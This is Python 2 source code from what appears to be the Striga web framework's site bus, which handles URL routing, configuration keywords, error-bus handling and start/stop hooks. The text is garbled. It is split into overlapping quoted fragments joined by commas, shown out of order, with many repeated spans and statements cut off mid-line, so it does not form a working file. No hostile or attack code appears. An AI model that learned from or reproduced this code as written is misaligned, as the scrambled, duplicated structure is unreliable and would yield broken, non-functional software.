(self.RootDir)) else: L.warning(\"Bus", "one errorbus defined - overwriting\") from ._stsvcsb_errorbus import ErrorBus self.ErrorBus = ErrorBus() rootdir", "= None, index = None, rootdir = '.'): ''' @param path - can", "= self.CrossroadBusItems.get(path[0], None) if bm is None: bm = self.DefaultBusItem if bm is", "None): if rootdir is None: rootdir = os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not", "keyword - serve ''' from ._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize))", "Redirections are not solved thru ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue", "defined - overwriting\") from ._stsvcsb_errorbus import ErrorBus self.ErrorBus = ErrorBus() rootdir = os.path.join(self.RootDir,", "striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in CrossroadBusItems & DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None) if", "exec ''' from ._stsvcsb_exec import Exec rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir,", "__configure_errorbus(self, conffilename, rootdir = '.'): if self.ErrorBus is not None: L.warning(\"Bus item has", "False except: L.exception(\"Exception during error bus processing:\") raise prev_excvalue else: raise def BusStart(self):", "given!\" % path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is already configured!\"", "def __call__(self, ctx, path): ''' Entry point to this bus object ''' SiteBusVar", "is not None) and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is not None: self.ErrorBus.BusStart()", "= {} for key, fn in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self) defs.update({ 'location'", "if rootdir is None: rootdir = os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir):", "ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self, conffilename, source, entry, path = None,", "rootdir) return l._configure(conffilename = conffilename, index = index, rootdir = rootdir) def __configure_errorbus(self,", "l._configure(conffilename = conffilename, index = index, rootdir = rootdir) def __configure_errorbus(self, conffilename, rootdir", "ctx.err.excvalue.Name else: L.exception(\"Generic exception during bus processing (you should use StrigaBusError exceptions)\") epath", "nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass, pathlimit)) return nbi._configure(conffilename = conffilename) def", "hasattr(bm, 'BusStart'): bm.BusStart() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem", "(self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is not None:", "self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop() for bm in self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop()", "item too ''' from ._stsvcsb_location import Location l = self._InsertBusItem(path, Location) rootdir =", "'exec' : self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!' : self._configure_finished, })", "index = None, rootdir = None): if rootdir is None: rootdir = os.path.dirname(conffilename)", "doesn't exist: '%s'\" % (self.RootDir)) self.Index = index defs = {} for key,", "path) except striga.core.exception._StrigaClientRedirectBase: # Redirections are not solved thru ErrorBus raise except: ctx.err.exctype,", "None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in CrossroadBusItems & DefaultBusItem bm", "''' from ._stsvcsb_cntrlr import Controller rootdir = os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller,", "None, busname = 'componentbus'): ''' Config keyword - componentbus ''' from ._stsvcsb_compbusref import", "hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if", "conffilename, rootdir = rootdir) def __configure_var(self, conffilename, name, default = 0): self.IntroBusItems.append(functools.partial(BusVar, name,", "from ._stsvcsb_cntrlr import Controller rootdir = os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir,", "ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus is", "for bm in self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart() for bm in self.CrossroadBusItems.itervalues(): if", "if self.ErrorBus is not None: self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus is not None:", "if hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart()", "if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item root directory is not directory: '%s'\"", "'componentbus' : self.__configure_componentbus, '!' : self._configure_finished, }) return defs def __configure_location(self, conffilename, path", "#First iterate thru IntroBusItems for ibm in self.IntroBusItems: ibm(ctx, path) #Check again as", "rootdir, source, entry, pathlimit)) def __configure_controller(self, conffilename, source, controllerclass = 'Controller', path =", "to this bus object ''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] =", "again as IntroBusItems can change path array if len(path) == 0: if self.Index", "= self.DefaultBusItem if bm is None: L.warning(\"Site bus path not found: {0}\".format(path)) raise", "exception during bus processing (you should use StrigaBusError exceptions)\") epath = str(ctx.err.exctype) try:", "is not None: self.ErrorBus.BusStop() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop()", "def __configure_location(self, conffilename, path = None, index = None, rootdir = '.'): '''", "keyword - view ''' from ._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode,", "None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" % path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item", "self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is already configured!\" % path) nbi =", "root directory doesn't exist: '%s'\" % (self.RootDir)) self.Index = index defs = {}", "is not None: self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus is not None: self.ErrorBus.BusStop() if", "hasattr(bm, 'BusStop'): bm.BusStop() ### def BusVar(name, default, ctx, path): if len(path) == 0:", "rootdir = '.'): ''' @param path - can be None as location can", "entry, path = None, pathlimit = '==0', rootdir = '.'): ''' Config keyword", "prev_excvalue else: raise def BusStart(self): for bm in self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart()", "Config keyword - view ''' from ._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View, self.RootDir, source,", "self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var' : self.__configure_var, 'serve' : self.__configure_serve, 'view' : self.__configure_view,", "- exec ''' from ._stsvcsb_exec import Exec rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec,", "not None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in CrossroadBusItems & DefaultBusItem", "copy, logging as L import striga.core.exception ### class Bus(object): CustomSiteBusDefs = {} PathCheckRE", "None, pathlimit = '==0', rootdir = '.'): ''' Config keyword - Controller '''", "'.'): if self.ErrorBus is not None: L.warning(\"Bus item has already one errorbus defined", "'%s'\" % (self.RootDir)) self.Index = index defs = {} for key, fn in", "len(path) == 0: if self.Index is not None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then", "def _configure_finished(self): pass def __call__(self, ctx, path): ''' Entry point to this bus", "- overwriting\") from ._stsvcsb_errorbus import ErrorBus self.ErrorBus = ErrorBus() rootdir = os.path.join(self.RootDir, rootdir)", "bm is None: L.warning(\"Site bus path not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath']", "striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is already configured!\" % path) nbi = createitemfnct() self.CrossroadBusItems[path]", "defs = {} for key, fn in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self) defs.update({", ": self.__configure_componentbus, '!' : self._configure_finished, }) return defs def __configure_location(self, conffilename, path =", "hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is not None: self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus", "''' from ._stsvcsb_location import Location l = self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir, rootdir)", "self.ErrorBus(ctx, epath) return False except: L.exception(\"Exception during error bus processing:\") raise prev_excvalue else:", "path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is already configured!\" % path)", "l = self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir, rootdir) return l._configure(conffilename = conffilename, index", "'controller' : self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!' : self._configure_finished, }) return defs def", "if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else: L.exception(\"Generic exception during bus processing (you", "import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize)) def __configure_view(self, conffilename, source, mode, path", "= copy.copy(ctx.err.excvalue) if self.ErrorBus is not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name", "buffersize = 64*1024): ''' Config keyword - serve ''' from ._stsvcsb_serve import Serve", "self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop() ### def BusVar(name, default, ctx, path): if len(path)", ": self.__configure_serve, 'view' : self.__configure_view, 'exec' : self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus' :", "- can be None as location can be default sitebus item too '''", "'BusStop'): self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop() for bm in", "is already configured!\") self.DefaultBusItem = createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path) is None: raise", "bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop() for bm in self.IntroBusItems: if hasattr(bm,", "rootdir) return self.ErrorBus._configure(conffilename = conffilename, rootdir = rootdir) def __configure_var(self, conffilename, name, default", "self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus is not None: self.ErrorBus.BusStop() if (self.DefaultBusItem is not", "path is None: if self.DefaultBusItem is not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item is", "''' from ._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode, entry, pathlimit)) def", "bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase: # Redirections are not solved thru ErrorBus raise except:", "if self.ErrorBus is not None: L.warning(\"Bus item has already one errorbus defined -", "path = None, entry='main', pathlimit='==0'): ''' Config keyword - view ''' from ._stsvcsb_view", "solved thru ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if", "BusVar(name, default, ctx, path): if len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0)", "self.CrossroadBusItems self.RootDir = None self.Index = None self.ErrorBus = None def _InsertBusItem(self, path,", "= None self.Index = None self.ErrorBus = None def _InsertBusItem(self, path, createitemfnct): if", "= index defs = {} for key, fn in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn,", "for key, fn in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self) defs.update({ 'location' : self.__configure_location,", "== 0: if self.Index is not None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find", "conffilename, source, entry, path = None, pathlimit = '==0', rootdir = '.'): '''", "default)) def __configure_serve(self, conffilename, pattern, path = None, buffersize = 64*1024): ''' Config", "None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else: L.exception(\"Generic exception during bus processing", "conffilename, source, mode, path = None, entry='main', pathlimit='==0'): ''' Config keyword - view", "os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item root directory", "import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self, conffilename, source, entry, path =", "conffilename, rootdir = '.'): if self.ErrorBus is not None: L.warning(\"Bus item has already", "bm = self.DefaultBusItem if bm is None: L.warning(\"Site bus path not found: {0}\".format(path))", "#Iterate thru this (call each) in the begining self.CrossroadBusItems = {} #Check path", "__configure_controller(self, conffilename, source, controllerclass = 'Controller', path = None, pathlimit = '==0', rootdir", "os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry, pathlimit)) def __configure_controller(self, conffilename, source, controllerclass", "rootdir) def __configure_var(self, conffilename, name, default = 0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self,", "raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in CrossroadBusItems & DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None)", "errorbus defined - overwriting\") from ._stsvcsb_errorbus import ErrorBus self.ErrorBus = ErrorBus() rootdir =", "sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus is not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath", "= None, rootdir = None): if rootdir is None: rootdir = os.path.dirname(conffilename) self.RootDir", "conffilename, index = None, rootdir = None): if rootdir is None: rootdir =", "pattern, buffersize)) def __configure_view(self, conffilename, source, mode, path = None, entry='main', pathlimit='==0'): '''", "createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" %", "def __configure_view(self, conffilename, source, mode, path = None, entry='main', pathlimit='==0'): ''' Config keyword", "item in CrossroadBusItems & DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None) if bm is None:", "_configure(self, conffilename, index = None, rootdir = None): if rootdir is None: rootdir", "in self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop() ### def BusVar(name, default, ctx, path): if", "self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStart'):", "None #Call when not found anything in self.CrossroadBusItems self.RootDir = None self.Index =", "os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item root directory is not directory:", "defs def __configure_location(self, conffilename, path = None, index = None, rootdir = '.'):", "= None, pathlimit = '==0', rootdir = '.'): ''' Config keyword - exec", "if os.path.exists(self.RootDir): L.warning(\"Bus item root directory is not directory: '%s'\" % (self.RootDir)) else:", "index, rootdir = rootdir) def __configure_errorbus(self, conffilename, rootdir = '.'): if self.ErrorBus is", "Location) rootdir = os.path.join(self.RootDir, rootdir) return l._configure(conffilename = conffilename, index = index, rootdir", "pathlimit = '==0', rootdir = '.'): ''' Config keyword - Controller ''' from", "raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase: # Redirections are", "functools.partial(fn, self) defs.update({ 'location' : self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var' : self.__configure_var, 'serve'", "self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self, conffilename, pattern, path = None, buffersize = 64*1024):", "def __configure_var(self, conffilename, name, default = 0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self, conffilename,", "component, path = None, busname = 'componentbus'): ''' Config keyword - componentbus '''", "controllerclass = 'Controller', path = None, pathlimit = '==0', rootdir = '.'): '''", "''' from ._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize)) def __configure_view(self, conffilename,", "ErrorBus() rootdir = os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename = conffilename, rootdir = rootdir) def", "'componentbus'): ''' Config keyword - componentbus ''' from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef,", "self._configure_finished, }) return defs def __configure_location(self, conffilename, path = None, index = None,", "self.RootDir, pattern, buffersize)) def __configure_view(self, conffilename, source, mode, path = None, entry='main', pathlimit='==0'):", "is not None: L.warning(\"Bus item has already one errorbus defined - overwriting\") from", "def _InsertBusItem(self, path, createitemfnct): if path is None: if self.DefaultBusItem is not None:", "else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase: # Redirections are not solved", "bm in self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop() ### def BusVar(name, default, ctx, path):", "L.exception(\"Generic exception during bus processing (you should use StrigaBusError exceptions)\") epath = str(ctx.err.exctype)", ": self.__configure_view, 'exec' : self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!' :", "rootdir = os.path.join(self.RootDir, rootdir) return l._configure(conffilename = conffilename, index = index, rootdir =", "'.'): ''' Config keyword - Controller ''' from ._stsvcsb_cntrlr import Controller rootdir =", "not None) and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is not None: self.ErrorBus.BusStart() def", "call item from that self.DefaultBusItem = None #Call when not found anything in", "return defs def __configure_location(self, conffilename, path = None, index = None, rootdir =", "__configure_exec(self, conffilename, source, entry, path = None, pathlimit = '==0', rootdir = '.'):", ": self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!' : self._configure_finished, }) return", "not None: L.warning(\"Bus item has already one errorbus defined - overwriting\") from ._stsvcsb_errorbus", "= 0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self, conffilename, pattern, path = None, buffersize", "Controller rootdir = os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass, pathlimit))", "'==0', rootdir = '.'): ''' Config keyword - Controller ''' from ._stsvcsb_cntrlr import", "pathlimit)) def __configure_controller(self, conffilename, source, controllerclass = 'Controller', path = None, pathlimit =", "ctx, path): if len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if val", "for ibm in self.IntroBusItems: ibm(ctx, path) #Check again as IntroBusItems can change path", "found anything in self.CrossroadBusItems self.RootDir = None self.Index = None self.ErrorBus = None", "= os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item root directory is not", "._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self, conffilename, source, entry, path", "Exec rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry, pathlimit)) def __configure_controller(self,", "path array if len(path) == 0: if self.Index is not None: path.append(self.Index) else:", "in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem,", "is None: rootdir = os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir):", "re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems = [] #Iterate thru this (call each) in the", "striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if val == '': val = default ctx.req.Vars.SITEBUS[name] =", "isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else: L.exception(\"Generic exception during bus processing (you should", "self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir, rootdir) return l._configure(conffilename = conffilename, index = index,", "anything in self.CrossroadBusItems self.RootDir = None self.Index = None self.ErrorBus = None def", "for bm in self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop() ### def BusVar(name, default, ctx,", "path): ''' Entry point to this bus object ''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir']", "if self.ErrorBus is not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else: L.exception(\"Generic", "Config keyword - componentbus ''' from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname))", "#Then find item in CrossroadBusItems & DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None) if bm", "StrigaBusError exceptions)\") epath = str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return False except: L.exception(\"Exception during", "self.Index = None self.ErrorBus = None def _InsertBusItem(self, path, createitemfnct): if path is", "None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop()", "conffilename, path = None, index = None, rootdir = '.'): ''' @param path", "#Call when not found anything in self.CrossroadBusItems self.RootDir = None self.Index = None", "rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry, pathlimit)) def __configure_controller(self, conffilename, source, controllerclass =", "self.ErrorBus is not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else: L.exception(\"Generic exception", "#Check again as IntroBusItems can change path array if len(path) == 0: if", "self.__configure_serve, 'view' : self.__configure_view, 'exec' : self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus' : self.__configure_componentbus,", "nbi._configure(conffilename = conffilename) def _configure_finished(self): pass def __call__(self, ctx, path): ''' Entry point", "nbi = createitemfnct() self.CrossroadBusItems[path] = nbi return nbi def _configure(self, conffilename, index =", "= 'componentbus'): ''' Config keyword - componentbus ''' from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path,", "component, busname)) def __configure_exec(self, conffilename, source, entry, path = None, pathlimit = '==0',", "__init__(self): self.IntroBusItems = [] #Iterate thru this (call each) in the begining self.CrossroadBusItems", "= conffilename, index = index, rootdir = rootdir) def __configure_errorbus(self, conffilename, rootdir =", "self.DefaultBusItem if self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" % path) if", "._stsvcsb_errorbus import ErrorBus self.ErrorBus = ErrorBus() rootdir = os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename =", "exceptions)\") epath = str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return False except: L.exception(\"Exception during error", "keyword - exec ''' from ._stsvcsb_exec import Exec rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path,", "root directory is not directory: '%s'\" % (self.RootDir)) else: L.warning(\"Bus item root directory", "BusStop(self): if self.ErrorBus is not None: self.ErrorBus.BusStop() if (self.DefaultBusItem is not None) and", "functools, copy, logging as L import striga.core.exception ### class Bus(object): CustomSiteBusDefs = {}", "L.warning(\"Bus item has already one errorbus defined - overwriting\") from ._stsvcsb_errorbus import ErrorBus", "thru this (call each) in the begining self.CrossroadBusItems = {} #Check path against", "._stsvcsb_location import Location l = self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir, rootdir) return l._configure(conffilename", "from that self.DefaultBusItem = None #Call when not found anything in self.CrossroadBusItems self.RootDir", "= re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems = [] #Iterate thru this (call each) in", "defs.update({ 'location' : self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var' : self.__configure_var, 'serve' : self.__configure_serve,", "not None: self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus is not None: self.ErrorBus.BusStop() if (self.DefaultBusItem", "0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self, conffilename, pattern, path = None, buffersize =", "import View self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode, entry, pathlimit)) def __configure_componentbus(self, conffilename, component,", "return l._configure(conffilename = conffilename, index = index, rootdir = rootdir) def __configure_errorbus(self, conffilename,", "self.IntroBusItems: ibm(ctx, path) #Check again as IntroBusItems can change path array if len(path)", "thru IntroBusItems for ibm in self.IntroBusItems: ibm(ctx, path) #Check again as IntroBusItems can", "__configure_componentbus(self, conffilename, component, path = None, busname = 'componentbus'): ''' Config keyword -", "if self.ErrorBus is not None: self.ErrorBus.BusStop() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem,", "}) return defs def __configure_location(self, conffilename, path = None, index = None, rootdir", "rootdir = rootdir) def __configure_errorbus(self, conffilename, rootdir = '.'): if self.ErrorBus is not", "item has already one errorbus defined - overwriting\") from ._stsvcsb_errorbus import ErrorBus self.ErrorBus", "if path is None: if self.DefaultBusItem is not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item", "64*1024): ''' Config keyword - serve ''' from ._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve,", "source, mode, entry, pathlimit)) def __configure_componentbus(self, conffilename, component, path = None, busname =", "= None, busname = 'componentbus'): ''' Config keyword - componentbus ''' from ._stsvcsb_compbusref", "CrossroadBusItems & DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None) if bm is None: bm =", "str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return False except: L.exception(\"Exception during error bus processing:\") raise", "._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize)) def __configure_view(self, conffilename, source, mode,", "path) #Check again as IntroBusItems can change path array if len(path) == 0:", "against this, if ok, call item from that self.DefaultBusItem = None #Call when", "= sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus is not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError):", "striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else: L.exception(\"Generic exception during bus processing (you should use", "self.ErrorBus is not None: self.ErrorBus.BusStop() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStop'):", "if self.DefaultBusItem is not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item is already configured!\") self.DefaultBusItem", "too ''' from ._stsvcsb_location import Location l = self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir,", "is not directory: '%s'\" % (self.RootDir)) else: L.warning(\"Bus item root directory doesn't exist:", "buffersize)) def __configure_view(self, conffilename, source, mode, path = None, entry='main', pathlimit='==0'): ''' Config", "{} for key, fn in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self) defs.update({ 'location' :", "keyword - Controller ''' from ._stsvcsb_cntrlr import Controller rootdir = os.path.join(self.RootDir, rootdir) nbi", "object ''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] = self try: #First", "should use StrigaBusError exceptions)\") epath = str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return False except:", "striga.core.exception.StrigaConfigurationError(\"Default bus item is already configured!\") self.DefaultBusItem = createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path)", ": self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var' : self.__configure_var, 'serve' : self.__configure_serve, 'view' :", "busname = 'componentbus'): ''' Config keyword - componentbus ''' from ._stsvcsb_compbusref import ComponentBusRef", "ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus is not None: if", "during error bus processing:\") raise prev_excvalue else: raise def BusStart(self): for bm in", "raise except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus is not", "self.DefaultBusItem if bm is None: L.warning(\"Site bus path not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound')", "self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!' : self._configure_finished, }) return defs def __configure_location(self, conffilename,", "self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!' : self._configure_finished, }) return defs", "def BusStart(self): for bm in self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart() for bm in", "{} #Check path against this, if ok, call item from that self.DefaultBusItem =", "is not None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm,", "and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop() for", "if bm is None: L.warning(\"Site bus path not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else:", "return nbi._configure(conffilename = conffilename) def _configure_finished(self): pass def __call__(self, ctx, path): ''' Entry", "### class Bus(object): CustomSiteBusDefs = {} PathCheckRE = re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems =", "self.RootDir = None self.Index = None self.ErrorBus = None def _InsertBusItem(self, path, createitemfnct):", "rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass, pathlimit)) return nbi._configure(conffilename = conffilename)", "None) and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is not None: self.ErrorBus.BusStart() def BusStop(self):", "item for '%s' is already configured!\" % path) nbi = createitemfnct() self.CrossroadBusItems[path] =", "= '==0', rootdir = '.'): ''' Config keyword - exec ''' from ._stsvcsb_exec", "= None, pathlimit = '==0', rootdir = '.'): ''' Config keyword - Controller", "entry, pathlimit)) def 